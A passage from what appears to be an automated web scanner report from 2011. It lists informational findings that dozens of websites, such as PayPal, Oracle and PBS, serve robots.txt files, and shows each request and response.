HTTP/1.1 200 OK
Connection: close
Content-Length: 168
Date: Sat, 02 Apr 2011 13:52:35 GMT
Content-Type: text/plain
ETag: "0d4206240f1ca1:0"
Set-Cookie: olive=R3372667923; path=/
Last-Modified: Tue, 11 May 2010 19:30:16 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

# Robots.txt

User-agent: *
Disallow:

User-agent: *
Disallow: /OEG95RTPHTM/

User-Agent: MJ12bot
Disallow:

Sitemap: http://www.olivegarden.com/sitemap.xml
24.615. http://www.onemanga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onemanga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onemanga.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:06:47 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 25 Jan 2011 17:56:01 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: geo_code="1.202.220.5:CN:China"; expires=Sun, 03-Apr-2011 14:05:40 GMT; Max-Age=86400; Path=/
Vary: Accept-Encoding
Content-Length: 23
Age: 67
X-Cache: HIT
Via: proxy02

User-agent: *
Allow: /
24.616. http://www.onlywire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlywire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlywire.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:31 GMT
Server: Apache
Last-Modified: Tue, 29 Jun 2010 06:30:35 GMT
ETag: "984a3-1a-48a255ff298c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
24.617. http://www.oodle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oodle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/plain;charset=utf-8
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Length: 1254
Connection: close

User-agent: *
Disallow: /api/
Disallow: /r/
Disallow: /ra/
Disallow: /rb/
Disallow: /rc/
Disallow: /rd/
Disallow: /re/
Disallow: /rf/
Disallow: /rg/
Disallow: /rh/
Disallow: /ri/
Disallow: /rj/
Disall
...[SNIP]...
24.618. http://www.opentable.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:45:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: txt; charset=utf-8
Content-Length: 1041

# robots.txt for http://www.opentable.com/

User-agent: *
Disallow: /_LBStatus
Disallow: /admin
Disallow: /aspnet_client
Disallow: /bin/
Disallow: /Components
Allow: /img/restimages
Allow: /i
...[SNIP]...
24.619. http://www.opera.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opera.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opera.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:19 GMT
Server: Apache
Last-Modified: Thu, 04 Jun 2009 12:55:31 GMT
ETag: "20043abd-4e-46b854a7756c0"
Accept-Ranges: bytes
Content-Length: 78
Content-Type: text/plain
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow: /*?viewmobile
Disallow: /*?viewfull
Disallow: /portal
24.620. http://www.opinionlab.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionlab.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opinionlab.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/plain
Last-Modified: Tue, 23 Nov 2010 17:14:44 GMT
Accept-Ranges: bytes
ETag: "bef471ec318bcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
ETags: ""
Date: Sat, 02 Apr 2011 14:06:25 GMT
Connection: close
Content-Length: 626

User-agent: *
Disallow: /_MACOSX/
Disallow: /_notes/
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /private/
Disallow: /247ometricv2/
Disallow: /247ometricv21/
Disallow: /247ometricv21/A/
Dis
...[SNIP]...
24.621. http://www.opm.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opm.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opm.gov

Response

HTTP/1.0 200 OK
Content-Length: 830
Content-Type: text/plain
Last-Modified: Wed, 10 Dec 2008 17:21:13 GMT
Accept-Ranges: bytes
ETag: "9c586eb3eb5ac91:1244"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:13:00 GMT
Connection: close

User-agent: *
Disallow: /insure/carriers
Disallow: /carrier/dentalvision
Disallow: /spiders/not/here/
Disallow: /2KSpanish
Disallow: /508FEORP
Disallow: /_aspdlls
Disallow: /_CFCR
Disallow: /_
...[SNIP]...
24.622. http://www.opportunity.co/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opportunity.co
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opportunity.co

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 01 Apr 2011 21:59:35 GMT
ETag: "47b014e-cd-8682ffc0"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /_css
Disallow: /_images
Disallow: /_includes
Disallow: /_js
Disallow: /_process
Disallow: /event
Disallow: /media
Disallow: /now
Disallow: /pigsfly
Disallow: /web-dom
...[SNIP]...
24.623. http://www.oprah.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oprah.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oprah.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 26 Jan 2011 17:39:10 GMT
ntCoent-Length: 217
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Cache-Control: private, max-age=325
Date: Sat, 02 Apr 2011 13:35:56 GMT
Content-Length: 217
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.oprah.com
Set-Cookie: check_loc=US; expires=Sun, 03-Apr-2011 13:35:56 GMT; path=/

User-agent: *
Allow: /
Disallow: /*preview=*
Disallow: *search*
Disallow: *print*
Disallow: *profile*
Disallow: *plug*
Disallow: *messageID*
Disallow: *searchID*
Disallow: *pollid*
Disallow: *cmd*
Dis
...[SNIP]...
24.624. http://www.oracle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
SS_FRIENDLY_EXT: txt
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=290;ecid=64613523913364888,0)
Date: Sat, 02 Apr 2011 13:40:06 GMT
Content-Length: 20436
Connection: close

# /robots.txt for www.oracle.com
User-agent: *
Sitemap: http://www.oracle.com/oracle-sitemap.xml
Sitemap: http://www.oracle.com/wocportal/page/wocprod/rssmanager/admin/rss/html/events_sitemap.xml

...[SNIP]...
24.625. http://www.orbitz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orbitz.com

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 17:17:09 GMT
ETag: "23d-49f8e1d160f40"
Content-Type: text/plain
Content-Length: 573
Server: Apache
Date: Sat, 02 Apr 2011 13:33:54 GMT
Age: 155441
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

## Last updated March 24, 2010
User-agent: *
Disallow: /d.gif
Disallow: /global/
Disallow: /img/
Disallow: /partner/
Disallow: /creditcard/
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
D
...[SNIP]...
24.626. http://www.orchardbank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orchardbank.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orchardbank.com

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:36:16 GMT
Content-length: 16427
Content-type: text/plain
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301751376.598483; path=/; expires=Tue, 30-Mar-2021 13:36:16 GMT
P3p: CP="CAO COR ADM DEVa TAIa PSA PSD IVAa IVDa CONa HIS OUR LEG CNT"
Expires: Sat, 02 Apr 2011 14:06:16 GMT
Last-modified: Fri, 19 Feb 2010 11:33:44 GMT
Surrogate-control: no-store
Content-language: en
Set-cookie: LASCCSSA2001US_ID=0000HWufcEw8HLGtyVnhPN8Jp09:15nj89jhq; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close

# mapping for web robots
# Added Allow, disallows & Sitemap directives as per SEO requirements for Aug 09 release.
User-agent: *
# ----------------------Allows Start -------------------------------
...[SNIP]...
24.627. http://www.oregonlive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oregonlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oregonlive.com

Response

HTTP/1.0 200 OK
Server: Apache
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:43:52 GMT
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:43:51 GMT
Content-Length: 388
Connection: close
Set-Cookie: Apache=69.2.101.254.1301751831418932; path=/; expires=Sun, 01-Apr-12 13:43:51 GMT

# Robots.txt for http://www.oregonlive.com/
# Last updated 03/01/2011

Sitemap: http://blog.oregonlive.com/www-sitemapindex.xml

User-agent: *
Disallow: /auctions/
Disallow: /cgi-bin/
Disallow: /print
...[SNIP]...
24.628. http://www.orientaltrading.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orientaltrading.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orientaltrading.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Sep 2009 23:16:52 GMT
Accept-Ranges: bytes
Content-Length: 354
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:42:02 GMT
Connection: close

# robots.txt for http://www.orientaltrading.com/sitemap.xml

User-agent: *


#affiliates directory
Disallow: /application
Disallow: /aff/
Disallow: /business_edition/
Disallow: /carnival/
Disallow
...[SNIP]...
24.629. http://www.ourstage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourstage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ourstage.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:47 GMT
Server: haproxy
Last-Modified: Thu, 12 Aug 2010 18:21:59 GMT
ETag: "10273-181-48da471213fc0"
Accept-Ranges: bytes
Content-Length: 385
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /tracker/
Disallow: /live/
Disallow: /embed/
Disallow: /gmap/
Disallow: /short_n_tweet/
Disallow: /tracks/TRACK_KEY
Disallow: /tracks/TRACK_KEY/
Disallow: /profile/ARTIST_KEY
D
...[SNIP]...
24.630. http://www.overstock.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.overstock.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:29 GMT
Server: Apache
Last-Modified: Wed, 29 Jul 2009 05:52:26 GMT
Accept-Ranges: bytes
Content-Length: 1033
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/plain

User-Agent: *
Disallow: /sm-*
Disallow: /cart
Disallow: /checkout
Disallow: https://www.overstock.com/cgi-bin/d2.cgi?PAGE=MYACCOUNT
Disallow: https://www.overstock.com/cgi-bin/d2.
...[SNIP]...
24.631. http://www.ovguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ovguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ovguide.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:52 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding,User-Agent
Content-Length: 129
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /search/
Disallow: /landing/iframe_landing_ad.php

Sitemap: http://sitemap.ovguide.com/sitemap_index.xml
24.632. http://www.parenting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parenting.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parenting.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 06 Jan 2011 23:16:26 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4d D=1720
Content-Type: text/plain
Content-Language: en
cache-control: max-age = 3600
Content-Length: 2920
Date: Sat, 02 Apr 2011 14:12:43 GMT
X-Varnish: 2020012568 2019994151
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: webcache12: HIT 2

### BEGIN FILE - Parenting (December 2010)###
#
# The use of robots or other automated means to access any Bonnier Corporation website
# without the express permission of Bonnier Corporation is st
...[SNIP]...
24.633. http://www.parentsconnect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parentsconnect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parentsconnect.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Fri, 11 Mar 2011 22:14:57 GMT
ETag: "2e3fef9-48-49e3c4accba40"
Accept-Ranges: bytes
Content-Length: 72
Content-Type: text/plain
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:36:39 GMT
Connection: close

User-agent: *
Disallow: /common/error/
Disallow: /errors/
Disallow: /me/
24.634. http://www.partstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.partstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.partstore.com

Response

HTTP/1.1 200 OK
Content-Length: 897
Content-Type: text/plain
Last-Modified: Thu, 30 Sep 2010 18:41:54 GMT
Accept-Ranges: bytes
ETag: "045f27cf60cb1:8a4b"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:19:39 GMT
Connection: close

User-Agent: OmniExplorer_Bot
Disallow: /

User-agent: *
Disallow: /Utility/
Disallow: /GetBasket.aspx
Disallow: /ChangePassword.aspx
Disallow: /CVNHelp.aspx
Disallow: /EasyReturns.aspx
Disall
...[SNIP]...
24.635. http://www.partypoker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.partypoker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.partypoker.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:18 GMT
Server: Apache
Set-Cookie: PPID=10.201.4.7.1301751258127882; path=/; expires=Tue, 30-Mar-21 13:34:18 GMT; domain=.partypoker.com
Last-Modified: Tue, 02 Feb 2010 12:19:01 GMT
Accept-Ranges: bytes
Content-Length: 435
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:34:18 GMT
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1) gen true for "http://tracker.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1))
Keep-Alive: timeout=5, max=96
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /affiliates/
Disallow: /common/
Disallow: /includes/
Disallow: /js/
Disallow: /js/http:/
Disallow: /scripts/
Disallow: /styles/
Disallow: /cgi-bin/
Disallow: /beta/
Disallow: /
...[SNIP]...
24.636. http://www.payless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.payless.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.payless.com

Response

HTTP/1.0 200 OK
Server:
Last-Modified: Fri, 28 Jan 2011 18:40:12 GMT
ETag: "e8-49aec65757b00"
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:45:48 GMT
Content-Length: 232
Connection: close

User-agent: *

Disallow: /store/user/login.jsp?redirectURL=/store/home/home.jsp
Disallow: /store/home/privacy.jsp
Disallow: /store/home/terms.jsp
Disallow: /store/account/
Disallow: /store/check
...[SNIP]...
24.637. http://www.paypal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paypal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paypal.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:42 GMT
Server: Apache
Last-Modified: Wed, 31 Mar 2010 21:55:38 GMT
Accept-Ranges: bytes
Content-Length: 374
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

### BEGIN FILE ###

# PayPal robots.txt file

User-agent: *
Disallow: /xclick-auction/
Disallow: /affil/
Disallow: /*?cmd=_flow
Disallow: /*?SESSION
Disallow: /*?cmd=_s-xclick
Disallow: /subscription
...[SNIP]...
24.638. http://www.pbs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pbs.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:30 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=85e38394389d49ca7ba16cda6553887c; path=/; domain=.pbs.org
Last-Modified: Thu, 31 Mar 2011 13:35:07 GMT
ETag: "9b7928-847-49fc75c8e98c0"
Accept-Ranges: bytes
Content-Length: 2119
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/*
Disallow: /cgi-registry/*
Disallow: /survey/
Disallow: /whatson/stations/
Disallow: /whatson/schedulex/
Disallow: /whatson/pbsyou/
Disallow: /whatson/dbs/
Disallow:
...[SNIP]...
24.639. http://www.pchlotto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pchlotto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pchlotto.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 28 Feb 2011 21:01:27 GMT
ETag: "ab4b8c-158-49d5dfbb057c0"
Accept-Ranges: bytes
Content-Length: 344
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:05:18 GMT
Connection: close

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
24.640. http://www.pcmag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcmag.com

Response

HTTP/1.0 200 OK
Content-Length: 438
Content-Type: text/plain
Last-Modified: Tue, 30 Nov 2010 20:01:03 GMT
Accept-Ranges: bytes
ETag: "6f123051c990cb1:46c"
Server: Microsoft-IIS/6.0
X-Powered-By: p3
Expires: Sat, 02 Apr 2011 13:54:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:54:04 GMT
Connection: close

User-agent: *
Disallow: /products
Disallow: /products/
Disallow: /search_redirect
Disallow: /search_redirect/
Disallow: /search_results
Disallow: /search_results/
Disallow: /search
Disallow: /
...[SNIP]...
24.641. http://www.pctools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pctools.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pctools.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 08 Sep 2010 02:40:32 GMT
ETag: "73e3bc-70-48fb66ff52800"
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from www3.pctools.com:8080
Date: Sat, 02 Apr 2011 13:43:49 GMT
Content-Length: 112
Connection: close

User-agent: *

Disallow: /myaccount/
Disallow: /info/

Sitemap: http://www.pctools.com/sitemaps/sitemapindex.xml
24.642. http://www.pcworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1470-1297458026000"
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Content-Type: text/plain
Vary: Accept-Encoding
Connection: close
Date: Sat, 02 Apr 2011 14:10:23 GMT
Age: 484
Content-Length: 1470

Sitemap: http://static.pcworld.com/sitemap/sitemap_index.xml
Sitemap: http://www.pcworld.com/googlenewssitemap.xml

User-agent: Googlebot
Disallow: /emailfriend
Disallow: /printable
Disallow: /r
...[SNIP]...
24.643. http://www.people.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.people.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.people.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:25 GMT
Server: Apache
Last-Modified: Mon, 25 Feb 2008 23:16:18 GMT
ETag: "18a-c25a1480"
Accept-Ranges: bytes
Content-Length: 394
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...
24.644. http://www.peoplefinders.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peoplefinders.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.peoplefinders.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 Oct 2010 14:51:55 GMT
Accept-Ranges: bytes
ETag: "80f72b31d6acb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:31 GMT
Connection: close
Content-Length: 205

Sitemap: http://www.peoplefinders.com/sitemap.xml

User-agent: *
Disallow: /bin/
Disallow: /App_Code/
Disallow: /App_Data/
Disallow: /controls/
Disallow: /Controllers/
Disallow: /Models/
Disallow: /Vi
...[SNIP]...
24.645. http://www.peopleofwalmart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peopleofwalmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.peopleofwalmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Oct 2009 04:39:09 GMT
ETag: "b0183-23-4767ead1a9540"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-admin/
24.646. http://www.peoplestylewatch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.peoplestylewatch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:32 GMT
Server: Apache
Last-Modified: Wed, 08 Dec 2010 22:07:40 GMT
ETag: "381-5982c300"
Accept-Ranges: bytes
Content-Length: 897
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...
24.647. http://www.petco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petco.com

Response

HTTP/1.1 200 OK
ETag: "bc6b7cbbb135cb1:926"
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Accept-Ranges: bytes
Content-Length: 267
Date: Sat, 02 Apr 2011 13:29:40 GMT
Connection: close
Last-Modified: Fri, 06 Aug 2010 21:52:58 GMT
X-Strangeloop: RCache
X-SL-RCache: Cached
Content-Type: text/plain

# Spider instructions for all web servers in the production pool
# Thu, 11 Dec 2008 06:18:00 -0400


# Exclude Files From All Robots:

User-agent: *
Disallow: /secure/
Disallow: /cart/
Disa
...[SNIP]...
24.648. http://www.petfinder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petfinder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petfinder.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.4 (Unix) mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.5
Last-Modified: Mon, 20 Sep 2010 18:45:15 GMT
Accept-Ranges: bytes
Content-Length: 229
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:38:21 GMT
Connection: close

Sitemap: http://www.petfinder.com/sitemapindex.xml

User-agent: *
Disallow: /cgi/
Disallow: /search/
Disallow: /shelterSearch/
Disallow: /pet-search

User-agent: Slurp
Crawl-delay: 2

User-agent: Medi
...[SNIP]...
24.649. http://www.petside.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petside.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petside.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 14 Mar 2011 22:09:27 GMT
ETag: "b61081-ab1-49e7890a773c0"
Content-Type: text/plain
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:41 GMT
Date: Sat, 02 Apr 2011 13:43:41 GMT
Content-Length: 2737
Connection: close

User-agent: *
Allow: /
Disallow: /Petside/
Disallow: /petside/
Disallow: /petsideblog/cats/
